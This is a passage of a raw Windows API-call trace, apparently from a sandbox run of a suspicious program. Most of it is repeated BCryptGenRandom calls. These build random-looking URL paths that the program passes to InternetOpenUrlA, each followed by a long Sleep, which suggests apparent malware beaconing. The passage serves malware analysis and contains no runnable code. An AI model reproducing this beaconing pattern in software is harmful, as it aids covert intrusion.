0x7ffc5bcc36b0 [0219.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.216] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.217] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.219] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.220] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.224] GetProcessHeap () returned 0x440000 [0219.224] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0219.224] lstrcpyA (in: lpString1=0x4741c0, lpString2="°NM" | out: lpString1="°NM") returned="°NM" [0219.224] lstrcatA (in: lpString1="°NM", lpString2="/94qVnv5yops1culQ2ujxx0s8yfmwh5mDaos8v/ttl6sogo3pw3t43Zsq56pnvd0mnjc/wKES2qes5eqmudus1t3myshruzilivh/HtaZzlHoJkh0xjsG7Hqu0p1z1obhhed2ly9fNmt7qo/" | out: lpString1="°NM/94qVnv5yops1culQ2ujxx0s8yfmwh5mDaos8v/ttl6sogo3pw3t43Zsq56pnvd0mnjc/wKES2qes5eqmudus1t3myshruzilivh/HtaZzlHoJkh0xjsG7Hqu0p1z1obhhed2ly9fNmt7qo/") returned="°NM/94qVnv5yops1culQ2ujxx0s8yfmwh5mDaos8v/ttl6sogo3pw3t43Zsq56pnvd0mnjc/wKES2qes5eqmudus1t3myshruzilivh/HtaZzlHoJkh0xjsG7Hqu0p1z1obhhed2ly9fNmt7qo/" [0219.225] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0219.225] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="°NM/94qVnv5yops1culQ2ujxx0s8yfmwh5mDaos8v/ttl6sogo3pw3t43Zsq56pnvd0mnjc/wKES2qes5eqmudus1t3myshruzilivh/HtaZzlHoJkh0xjsG7Hqu0p1z1obhhed2ly9fNmt7qo/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0219.225] GetProcessHeap () returned 0x440000 [0219.225] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0219.225] GetProcessHeap () returned 0x440000 [0219.225] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4eb0 | out: hHeap=0x440000) returned 1 [0219.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0219.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0219.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0219.545] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0219.545] Sleep (dwMilliseconds=0x1c5b9) [0219.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0219.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0219.863] GetProcessHeap () returned 0x440000 [0219.864] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f53f0 [0219.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0219.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f53f1, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x4f53f1) returned 0x0 [0219.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0219.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0219.871] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.874] GetProcessHeap () returned 0x440000 [0219.874] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0219.875] lstrcpyA (in: lpString1=0x473da0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0219.875] lstrcatA (in: lpString1="\x81\x03", lpString2="/Nu546kahwd9u0dmsjm1ABy181ch1Ndbj/" | out: lpString1="\x81\x03/Nu546kahwd9u0dmsjm1ABy181ch1Ndbj/") returned="\x81\x03/Nu546kahwd9u0dmsjm1ABy181ch1Ndbj/" [0219.875] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0219.875] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/Nu546kahwd9u0dmsjm1ABy181ch1Ndbj/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0219.876] GetProcessHeap () returned 0x440000 [0219.876] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0219.876] GetProcessHeap () returned 0x440000 [0219.876] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f53f0 | out: hHeap=0x440000) returned 1 [0219.876] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0219.878] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0219.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0219.879] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0219.879] Sleep (dwMilliseconds=0x1b612) [0220.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0220.185] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0220.185] GetProcessHeap () returned 0x440000 [0220.186] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17de0 [0220.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0220.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17de1, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a17de1) returned 0x0 [0220.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.186] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0220.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0220.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.191] BCryptGenRandom (in: 